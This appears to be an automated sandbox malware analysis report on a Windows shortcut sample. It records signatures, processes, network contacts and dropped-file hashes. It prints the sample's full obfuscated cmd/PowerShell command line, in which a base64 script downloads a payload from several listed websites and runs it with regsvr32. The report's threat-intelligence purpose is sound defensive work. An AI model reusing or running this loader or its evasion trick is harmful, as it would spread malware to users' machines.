Malware Analysis Report

2024-12-07 16:02

Sample ID 241113-rmffhasqbt
Target e3ed70c4f3def90f095d83a7539a99ba7dd76c8ca345f92458e6f2135c890f66
SHA256 e3ed70c4f3def90f095d83a7539a99ba7dd76c8ca345f92458e6f2135c890f66
Tags
execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

e3ed70c4f3def90f095d83a7539a99ba7dd76c8ca345f92458e6f2135c890f66

Threat Level: Likely malicious

The file e3ed70c4f3def90f095d83a7539a99ba7dd76c8ca345f92458e6f2135c890f66 was found to be: Likely malicious.

Malicious Activity Summary

execution

Blocklisted process makes network request

Checks computer location settings

Command and Scripting Interpreter: PowerShell

An obfuscated cmd.exe command-line is typically used to evade detection.

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 14:18

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 14:18

Reported

2024-11-13 14:20

Platform

win7-20240903-en

Max time kernel

122s

Max time network

123s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\e3ed70c4f3def90f095d83a7539a99ba7dd76c8ca345f92458e6f2135c890f66.lnk

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\e3ed70c4f3def90f095d83a7539a99ba7dd76c8ca345f92458e6f2135c890f66.lnk

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /v:on /c ehGG/roADSvchwtY4+9p3wHUictq4tqWddREKHzC9tLWlUd+pVah1coZrvwoaD30SW14tx00||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$xW='ICAgICAgV3JpdGUtSG9zdCAiclRnU0UiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYXN0ZXJmbGl4LmNvbS9PdmVydmlldy9RQTRTRTBEeENDRlM1VzhueEcvIiwiaHR0cDovL21hc3l1ay5jb20vNTgxdm95emUvQ1MvIiwiaHR0cDovL2xla2Fya2l2ZXQuc2UvaW5jbHVkZXMvbENZejNPMDdEMENtQVMvIiwiaHR0cDovL21hcnR5ci5kay94Mmhka2o1ZS8iLCJodHRwOi8vbWFydGluZ3JhbnQuY29tL2NnaS1iaW4veFJKWTEvIiwiaHR0cDovL2xlbW9uY2luZS5jb20vY3NzL2xqSXl5SEZ0dDZHSE9WZHdsSmIvIiwiaHR0cDovL21hbmRvbS5jby5pZC9hc3NldHMvZWpldnc4MktKNlZZRHpaWTNPLyIpOyR0PSJJd25NcyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxjSEtFc3RqaGZKLnVERDtSZWdzdnIzMi5leGUgIiRkXGNIS0VzdGpoZkoudUREIjticmVha30gY2F0Y2ggeyB9fQ==';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -c "&{$xW='ICAgICAgV3JpdGUtSG9zdCAiclRnU0UiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYXN0ZXJmbGl4LmNvbS9PdmVydmlldy9RQTRTRTBEeENDRlM1VzhueEcvIiwiaHR0cDovL21hc3l1ay5jb20vNTgxdm95emUvQ1MvIiwiaHR0cDovL2xla2Fya2l2ZXQuc2UvaW5jbHVkZXMvbENZejNPMDdEMENtQVMvIiwiaHR0cDovL21hcnR5ci5kay94Mmhka2o1ZS8iLCJodHRwOi8vbWFydGluZ3JhbnQuY29tL2NnaS1iaW4veFJKWTEvIiwiaHR0cDovL2xlbW9uY2luZS5jb20vY3NzL2xqSXl5SEZ0dDZHSE9WZHdsSmIvIiwiaHR0cDovL21hbmRvbS5jby5pZC9hc3NldHMvZWpldnc4MktKNlZZRHpaWTNPLyIpOyR0PSJJd25NcyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxjSEtFc3RqaGZKLnVERDtSZWdzdnIzMi5leGUgIiRkXGNIS0VzdGpoZkoudUREIjticmVha30gY2F0Y2ggeyB9fQ==';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"

Network

N/A

Files

memory/2972-40-0x000007FEF5DCE000-0x000007FEF5DCF000-memory.dmp

memory/2972-42-0x0000000001D90000-0x0000000001D98000-memory.dmp

memory/2972-41-0x000000001B680000-0x000000001B962000-memory.dmp

memory/2972-43-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

memory/2972-44-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

memory/2972-46-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

memory/2972-45-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

memory/2972-47-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

memory/2972-48-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 14:18

Reported

2024-11-13 14:20

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

150s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\e3ed70c4f3def90f095d83a7539a99ba7dd76c8ca345f92458e6f2135c890f66.lnk

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\e3ed70c4f3def90f095d83a7539a99ba7dd76c8ca345f92458e6f2135c890f66.lnk

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /v:on /c ehGG/roADSvchwtY4+9p3wHUictq4tqWddREKHzC9tLWlUd+pVah1coZrvwoaD30SW14tx00||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$xW='ICAgICAgV3JpdGUtSG9zdCAiclRnU0UiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYXN0ZXJmbGl4LmNvbS9PdmVydmlldy9RQTRTRTBEeENDRlM1VzhueEcvIiwiaHR0cDovL21hc3l1ay5jb20vNTgxdm95emUvQ1MvIiwiaHR0cDovL2xla2Fya2l2ZXQuc2UvaW5jbHVkZXMvbENZejNPMDdEMENtQVMvIiwiaHR0cDovL21hcnR5ci5kay94Mmhka2o1ZS8iLCJodHRwOi8vbWFydGluZ3JhbnQuY29tL2NnaS1iaW4veFJKWTEvIiwiaHR0cDovL2xlbW9uY2luZS5jb20vY3NzL2xqSXl5SEZ0dDZHSE9WZHdsSmIvIiwiaHR0cDovL21hbmRvbS5jby5pZC9hc3NldHMvZWpldnc4MktKNlZZRHpaWTNPLyIpOyR0PSJJd25NcyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxjSEtFc3RqaGZKLnVERDtSZWdzdnIzMi5leGUgIiRkXGNIS0VzdGpoZkoudUREIjticmVha30gY2F0Y2ggeyB9fQ==';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -c "&{$xW='ICAgICAgV3JpdGUtSG9zdCAiclRnU0UiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYXN0ZXJmbGl4LmNvbS9PdmVydmlldy9RQTRTRTBEeENDRlM1VzhueEcvIiwiaHR0cDovL21hc3l1ay5jb20vNTgxdm95emUvQ1MvIiwiaHR0cDovL2xla2Fya2l2ZXQuc2UvaW5jbHVkZXMvbENZejNPMDdEMENtQVMvIiwiaHR0cDovL21hcnR5ci5kay94Mmhka2o1ZS8iLCJodHRwOi8vbWFydGluZ3JhbnQuY29tL2NnaS1iaW4veFJKWTEvIiwiaHR0cDovL2xlbW9uY2luZS5jb20vY3NzL2xqSXl5SEZ0dDZHSE9WZHdsSmIvIiwiaHR0cDovL21hbmRvbS5jby5pZC9hc3NldHMvZWpldnc4MktKNlZZRHpaWTNPLyIpOyR0PSJJd25NcyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxjSEtFc3RqaGZKLnVERDtSZWdzdnIzMi5leGUgIiRkXGNIS0VzdGpoZkoudUREIjticmVha30gY2F0Y2ggeyB9fQ==';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"

C:\Windows\system32\regsvr32.exe

"C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\IwnMs\cHKEstjhfJ.uDD

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 masterflix.com udp
NL 185.232.250.84:80 masterflix.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 84.250.232.185.in-addr.arpa udp
US 8.8.8.8:53 masyuk.com udp
SG 128.199.252.32:80 masyuk.com tcp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 32.252.199.128.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 lekarkivet.se udp
DK 185.20.205.16:80 lekarkivet.se tcp
DK 185.20.205.16:443 lekarkivet.se tcp
US 8.8.8.8:53 martyr.dk udp
FI 65.108.197.134:80 martyr.dk tcp
US 8.8.8.8:53 martingrant.com udp
US 8.8.8.8:53 16.205.20.185.in-addr.arpa udp
US 8.8.8.8:53 134.197.108.65.in-addr.arpa udp
US 52.20.84.62:80 martingrant.com tcp
US 8.8.8.8:53 www.atom.com udp
US 8.8.8.8:53 lemoncine.com udp
US 104.22.72.252:443 www.atom.com tcp
US 31.170.160.89:80 lemoncine.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 172.217.169.67:80 c.pki.goog tcp
US 31.170.160.89:443 lemoncine.com tcp
US 8.8.8.8:53 62.84.20.52.in-addr.arpa udp
US 8.8.8.8:53 252.72.22.104.in-addr.arpa udp
US 8.8.8.8:53 89.160.170.31.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 www.recaptcha.net udp
US 8.8.8.8:53 mandom.co.id udp
GB 172.217.169.35:443 www.recaptcha.net tcp
US 8.8.8.8:53 o.pki.goog udp
GB 172.217.169.67:80 o.pki.goog tcp
ID 103.150.194.50:80 mandom.co.id tcp
US 8.8.8.8:53 35.169.217.172.in-addr.arpa udp
ID 103.150.194.50:443 mandom.co.id tcp
US 8.8.8.8:53 50.194.150.103.in-addr.arpa udp
US 8.8.8.8:53 226.21.18.104.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 232.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

memory/3612-0-0x00007FFA81943000-0x00007FFA81945000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4212dy3d.okg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3612-10-0x0000025FAECA0000-0x0000025FAECC2000-memory.dmp

memory/3612-11-0x00007FFA81940000-0x00007FFA82401000-memory.dmp

memory/3612-12-0x00007FFA81940000-0x00007FFA82401000-memory.dmp

memory/3612-13-0x0000025FC9E20000-0x0000025FCA5C6000-memory.dmp

C:\Users\Admin\AppData\Local\IwnMs\cHKEstjhfJ.uDD

MD5 9e9b48ae75ae39fd45ebf6799c9668d8
SHA1 7ed5cac9a268359ac09719dbbf354a83c23b1236
SHA256 bd19fca5c89301abcf7cceaa75294bc7981f1a4bea7ffeb29260c9716960f761
SHA512 c4b49773eba7ac113669f30444142bfb830b51f577795bcce45ebe382271f2f07a785fe47d10b5d18817e13bb7551563814552d174eee9f6e6f08c448ab31723

memory/3612-40-0x00007FFA81940000-0x00007FFA82401000-memory.dmp